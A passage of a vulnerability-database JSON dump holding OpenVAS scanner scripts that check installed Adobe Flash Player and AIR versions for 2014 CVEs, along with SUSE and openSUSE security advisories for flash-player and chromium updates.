use-after-free error.\n\n - A double free error.\n\n - Multiple type confusion errors.\n\n - An error related to a permission issue.\n\n - Multiple unspecified error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to 
disclose potentially sensitive information, bypass certain security\n restrictions, and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Adobe AIR version before 15.0.0.356\n on Mac OS X\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe AIR version\n 15.0.0.356 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/59978\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-24.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Air/MacOSX/Version\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/air\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"15.0.0.356\"))\n{\n report = report_fixed_ver(installed_version:airVer, fixed_version:\"15.0.0.356\");\n security_message(port:0, data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0581", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0590", "CVE-2014-8442", "CVE-2014-0583", "CVE-2014-0577", "CVE-2014-0589", "CVE-2014-0584", "CVE-2014-0586", "CVE-2014-0573", "CVE-2014-0585", "CVE-2014-8437", "CVE-2014-0582", "CVE-2014-0588", "CVE-2014-8440", "CVE-2014-8438", "CVE-2014-8441"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310851108", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851108", "type": 
"openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2014:1442-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851108\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 20:14:09 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-0573\", \"CVE-2014-0574\", \"CVE-2014-0576\", \"CVE-2014-0577\", \"CVE-2014-0581\", \"CVE-2014-0582\", \"CVE-2014-0583\", \"CVE-2014-0584\", \"CVE-2014-0585\", \"CVE-2014-0586\", \"CVE-2014-0588\", \"CVE-2014-0589\", \"CVE-2014-0590\", \"CVE-2014-8437\", \"CVE-2014-8438\", \"CVE-2014-8440\", \"CVE-2014-8441\", \"CVE-2014-8442\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2014:1442-1)\");\n\n script_tag(name:\"summary\", 
value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"flash-player was updated to version 11.2.202.418 to fix 18 security issues:\n\n * Memory corruption vulnerabilities that could lead to code execution\n (CVE-2014-0576, CVE-2014-0581, CVE-2014-8440, CVE-2014-8441).\n\n * Use-after-free vulnerabilities that could lead to code execution\n (CVE-2014-0573, CVE-2014-0588, CVE-2014-8438).\n\n * A double free vulnerability that could lead to code execution\n (CVE-2014-0574).\n\n * Type confusion vulnerabilities that could lead to code execution\n (CVE-2014-0577, CVE-2014-0584, CVE-2014-0585, CVE-2014-0586,\n CVE-2014-0590).\n\n * Heap buffer overflow vulnerabilities that could lead to code\n execution (CVE-2014-0582, CVE-2014-0589).\n\n * An information disclosure vulnerability that could be exploited to\n disclose session tokens (CVE-2014-8437).\n\n * A heap buffer overflow vulnerability that could be exploited to\n perform privilege escalation from low to medium integrity level\n (CVE-2014-0583).\n\n * A permission issue that could be exploited to perform privilege\n escalation from low to medium integrity level (CVE-2014-8442).\");\n\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-24.html\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 11 SP3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1442-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED11.0SP3\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.418~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.418~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.418~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-22T17:03:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0581", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0590", "CVE-2014-8442", "CVE-2014-0583", "CVE-2014-0577", "CVE-2014-0589", "CVE-2014-0584", "CVE-2014-0586", "CVE-2014-0573", "CVE-2014-0585", "CVE-2014-8437", "CVE-2014-0582", "CVE-2014-0588", "CVE-2014-8440", "CVE-2014-8438", "CVE-2014-8441"], "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2020-04-20T00:00:00", "published": "2014-11-14T00:00:00", "id": "OPENVAS:1361412562310804795", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804795", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities(APSB14-24)-(Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities(APSB14-24)-(Linux)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 
2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804795\");\n script_version(\"2020-04-20T13:31:49+0000\");\n script_cve_id(\"CVE-2014-0573\", \"CVE-2014-0574\", \"CVE-2014-0576\", \"CVE-2014-0577\",\n \"CVE-2014-0581\", \"CVE-2014-0582\", \"CVE-2014-0583\", \"CVE-2014-0584\",\n \"CVE-2014-0585\", \"CVE-2014-0586\", \"CVE-2014-0588\", \"CVE-2014-0589\",\n \"CVE-2014-0590\", \"CVE-2014-8437\", \"CVE-2014-8438\", \"CVE-2014-8440\",\n \"CVE-2014-8441\", \"CVE-2014-8442\");\n script_bugtraq_id(71033, 71041, 71037, 71038, 71042, 71039, 71035, 71043, 71044,\n 71045, 71048, 71051, 71046, 71036, 71049, 71047, 71050, 71040);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-20 13:31:49 +0000 (Mon, 20 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-11-14 11:47:37 +0530 (Fri, 14 Nov 2014)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities(APSB14-24)-(Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to 
multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple Flaws are due to,\n\n - An use-after-free error.\n\n - A double free error.\n\n - Multiple type confusion errors.\n\n - An error related to a permission issue.\n\n - Multiple unspecified error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to disclose potentially sensitive information, bypass certain security\n restrictions, and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 11.2.202.418 on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 11.2.202.418 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/59978\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-24.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.2.202.418\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"11.2.202.418\");\n security_message(port:0, data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0581", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0590", "CVE-2014-8442", "CVE-2014-0583", 
"CVE-2014-0577", "CVE-2014-0589", "CVE-2014-0584", "CVE-2014-0586", "CVE-2014-0573", "CVE-2014-0585", "CVE-2014-8437", "CVE-2014-0582", "CVE-2014-0588", "CVE-2014-8440", "CVE-2014-8438", "CVE-2014-8441"], "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2014-11-14T00:00:00", "id": "OPENVAS:1361412562310804794", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804794", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities(APSB14-24)-(Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities(APSB14-24)-(Mac OS X)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804794\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0573\", \"CVE-2014-0574\", \"CVE-2014-0576\", \"CVE-2014-0577\",\n \"CVE-2014-0581\", \"CVE-2014-0582\", \"CVE-2014-0583\", \"CVE-2014-0584\",\n \"CVE-2014-0585\", \"CVE-2014-0586\", \"CVE-2014-0588\", \"CVE-2014-0589\",\n \"CVE-2014-0590\", \"CVE-2014-8437\", \"CVE-2014-8438\", \"CVE-2014-8440\",\n \"CVE-2014-8441\", \"CVE-2014-8442\");\n script_bugtraq_id(71033, 71041, 71037, 71038, 71042, 71039, 71035, 71043, 71044,\n 71045, 71048, 71051, 71046, 71036, 71049, 71047, 71050, 71040);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-11-14 11:46:13 +0530 (Fri, 14 Nov 2014)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities(APSB14-24)-(Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple Flaws are due to,\n\n - An use-after-free error.\n\n - A double free error.\n\n - Multiple type confusion errors.\n\n - An error related to a permission issue.\n\n - Multiple unspecified error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow 
attackers\n to disclose potentially sensitive information, bypass certain security\n restrictions, and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Mac OS X\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.252 or 15.0.0.223 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/59978\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-24.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"13.0.0.252\") ||\n version_in_range(version:playerVer, test_version:\"14.0.0\", test_version2:\"15.0.0.222\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:05:42", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0574", "CVE-2014-7899", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7901", "CVE-2014-7903", "CVE-2014-7905", "CVE-2014-7910", "CVE-2014-7902", "CVE-2014-7900"], "description": "chromium was updated to version 39.0.2171.65 to fix 13 security issues.\n\n These security issues were fixed:\n - Use-after-free in pepper plugins (CVE-2014-7906).\n - Buffer overflow in OpenJPEG before r2911 in PDFium, as used in 
Google\n Chrome before 39.0.2171.65, al... (CVE-2014-7903).\n - Uninitialized memory read in Skia (CVE-2014-7909).\n - Unspecified security issues (CVE-2014-7910).\n - Integer overflow in media (CVE-2014-7908).\n - Integer overflow in the opj_t2_read_packet_data function\n in fxcodec/fx_libopenjpeg/libopenjpeg20/t2.... (CVE-2014-7901).\n - Use-after-free in blink (CVE-2014-7907).\n - Address bar spoofing (CVE-2014-7899).\n - Buffer overflow in Skia (CVE-2014-7904).\n - Use-after-free vulnerability in the CPDF_Parser (CVE-2014-7900).\n - Use-after-free vulnerability in PDFium allows DoS (CVE-2014-7902).\n - Flaw allowing navigation to intents that do not have the BROWSABLE\n category (CVE-2014-7905).\n - Double-free in Flash (CVE-2014-0574).\n\n", "edition": 1, "modified": "2014-12-12T09:04:56", "published": "2014-12-12T09:04:56", "id": "OPENSUSE-SU-2014:1626-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-12/msg00015.html", "type": "suse", "title": "Security update for chromium (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:45:47", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0581", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0590", "CVE-2014-8442", "CVE-2014-0583", "CVE-2014-0577", "CVE-2014-0589", "CVE-2014-0584", "CVE-2014-0586", "CVE-2014-0573", "CVE-2014-0585", "CVE-2014-8437", "CVE-2014-0582", "CVE-2014-0588", "CVE-2014-8440", "CVE-2014-8438", "CVE-2014-8441"], "description": "flash-player was updated to version 11.2.202.418 to fix 18 security issues:\n\n * Memory corruption vulnerabilities that could lead to code execution\n (CVE-2014-0576, CVE-2014-0581, CVE-2014-8440, CVE-2014-8441).\n * Use-after-free vulnerabilities that could lead to code execution\n (CVE-2014-0573, CVE-2014-0588, CVE-2014-8438).\n * A double free vulnerability that could lead to code execution\n (CVE-2014-0574).\n * Type confusion vulnerabilities that could lead to code 
execution\n (CVE-2014-0577, CVE-2014-0584, CVE-2014-0585, CVE-2014-0586,\n CVE-2014-0590).\n * Heap buffer overflow vulnerabilities that could lead to code\n execution (CVE-2014-0582, CVE-2014-0589).\n * An information disclosure vulnerability that could be exploited to\n disclose session tokens (CVE-2014-8437).\n * A heap buffer overflow vulnerability that could be exploited to\n perform privilege escalation from low to medium integrity level\n (CVE-2014-0583).\n * A permission issue that could be exploited to perform privilege\n escalation from low to medium integrity level (CVE-2014-8442).\n\n Further information can be found at\n <a rel=\"nofollow\" href=\"http://helpx.adobe.com/security/products/flash-player/apsb14-24.html\">http://helpx.adobe.com/security/products/flash-player/apsb14-24.html</a>\n <<a rel=\"nofollow\" href=\"http://helpx.adobe.com/security/products/flash-player/apsb14-24.html\">http://helpx.adobe.com/security/products/flash-player/apsb14-24.html</a>> .\n\n Security Issues:\n\n * CVE-2014-0576\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0576\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0576</a>>\n * CVE-2014-0581\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0581\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0581</a>>\n * CVE-2014-8440\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8440\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8440</a>>\n * CVE-2014-8441\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8441\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8441</a>>\n * CVE-2014-0573\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0573\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0573</a>>\n * CVE-2014-0588\n <<a rel=\"nofollow\" 
href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0588\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0588</a>>\n * CVE-2014-8438\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8438\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8438</a>>\n * CVE-2014-0574\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0574\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0574</a>>\n * CVE-2014-0577\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0577\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0577</a>>\n * CVE-2014-0584\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0584\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0584</a>>\n * CVE-2014-0585\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0585\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0585</a>>\n * CVE-2014-0586\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0586\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0586</a>>\n * CVE-2014-0590\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0590\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0590</a>>\n * CVE-2014-0582\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0582\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0582</a>>\n * CVE-2014-0589\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0589\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0589</a>>\n * CVE-2014-8437\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8437\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8437</a>>\n * CVE-2014-0583\n <<a rel=\"nofollow\" 
href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0583\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0583</a>>\n * CVE-2014-8442\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8442\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8442</a>>\n\n", "edition": 1, "modified": "2014-11-18T01:05:27", "published": "2014-11-18T01:05:27", "id": "SUSE-SU-2014:1442-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00015.html", "title": "Security update for flash-player (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:46:39", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0581", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0590", "CVE-2014-8442", "CVE-2014-0583", "CVE-2014-0577", "CVE-2014-0589", "CVE-2014-0584", "CVE-2014-0586", "CVE-2014-0573", "CVE-2014-0585", "CVE-2014-8437", "CVE-2014-0582", "CVE-2014-0588", "CVE-2014-8440", "CVE-2014-8438", "CVE-2014-8441"], "description": "flash-player was updated to version 11.2.202.418 to fix 18 security issues.\n\n These security issues were fixed:\n - Memory corruption vulnerabilities that could lead to code execution\n (CVE-2014-0576, CVE-2014-0581, CVE-2014-8440, CVE-2014-8441).\n - Use-after-free vulnerabilities that could lead to code execution\n (CVE-2014-0573, CVE-2014-0588, CVE-2014-8438).\n - A double free vulnerability that could lead to code execution\n (CVE-2014-0574).\n - Type confusion vulnerabilities that could lead to code execution\n (CVE-2014-0577, CVE-2014-0584, CVE-2014-0585, CVE-2014-0586,\n CVE-2014-0590).\n - Heap buffer overflow vulnerabilities that could lead to code execution\n (CVE-2014-0582, CVE-2014-0589).\n - An information disclosure vulnerability that could be exploited to\n disclose session tokens (CVE-2014-8437).\n - A heap buffer overflow vulnerability that could be exploited to perform\n privilege 
escalation from low to medium integrity level (CVE-2014-0583).\n - A permission issue that could be exploited to perform privilege\n escalation from low to medium integrity level (CVE-2014-8442).\n\n", "edition": 1, "modified": "2014-11-18T12:04:40", "published": "2014-11-18T12:04:40", "id": "OPENSUSE-SU-2014:1444-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00016.html", "type": "suse", "title": "Security update for flash-player (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:45:49", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0355", "CVE-2014-0581", "CVE-2014-0574", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2014-0576", "CVE-2015-0353", "CVE-2015-3041", "CVE-2014-0590", "CVE-2015-0350", "CVE-2014-8442", "CVE-2015-3040", "CVE-2014-0583", "CVE-2015-0349", "CVE-2014-0577", "CVE-2015-0352", "CVE-2014-0569", "CVE-2014-0589", "CVE-2014-0584", "CVE-2015-3044", "CVE-2015-0331", "CVE-2014-0558", "CVE-2014-0586", "CVE-2015-0347", "CVE-2015-0354", "CVE-2014-0573", "CVE-2014-0585", "CVE-2015-3039", "CVE-2014-8437", "CVE-2015-0360", "CVE-2014-0582", "CVE-2015-3038", "CVE-2015-0359", "CVE-2014-0588", "CVE-2015-0356", "CVE-2015-3043", "CVE-2014-8440", "CVE-2015-3042", "CVE-2014-8438", "CVE-2015-0332", "CVE-2014-0564", "CVE-2014-8441"], "description": "Adobe Flash Player was updated to 11.2.202.457 to fix several security\n issues that could lead to remote code execution.\n\n An exploit for CVE-2015-3043 was reported to exist in the wild.\n\n The following vulnerabilities were fixed:\n\n * Memory corruption vulnerabilities that could lead to code execution\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353,\n CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038,\n CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n * Type confusion vulnerability that could lead to code execution\n 
(CVE-2015-0356).\n * Buffer overflow vulnerability that could lead to code execution\n (CVE-2015-0348).\n * Use-after-free vulnerabilities that could lead to code execution\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358, CVE-2015-3039).\n * Double-free vulnerabilities that could lead to code execution\n (CVE-2015-0346, CVE-2015-0359).\n * Memory leak vulnerabilities that could be used to bypass ASLR\n (CVE-2015-0357, CVE-2015-3040).\n * Security bypass vulnerability that could lead to information disclosure\n (CVE-2015-3044)\n\n", "edition": 1, "modified": "2015-04-16T13:04:48", "published": "2015-04-16T13:04:48", "id": "OPENSUSE-SU-2015:0725-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00013.html", "type": "suse", "title": "Security update for Adobe Flash Player (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:23", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0574", "CVE-2014-7899", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7901", "CVE-2014-7903", "CVE-2014-7905", "CVE-2014-7910", "CVE-2014-7902", "CVE-2014-7900"], "description": "\nGoogle Chrome Releases reports:\n\n42 security fixes in this release, including:\n\n[389734] High CVE-2014-7899: Address bar spoofing. Credit to\n\t Eli Grey.\n[406868] High CVE-2014-7900: Use-after-free in pdfium. Credit\n\t to Atte Kettunen from OUSPG.\n[413375] High CVE-2014-7901: Integer overflow in pdfium. Credit\n\t to cloudfuzzer.\n[414504] High CVE-2014-7902: 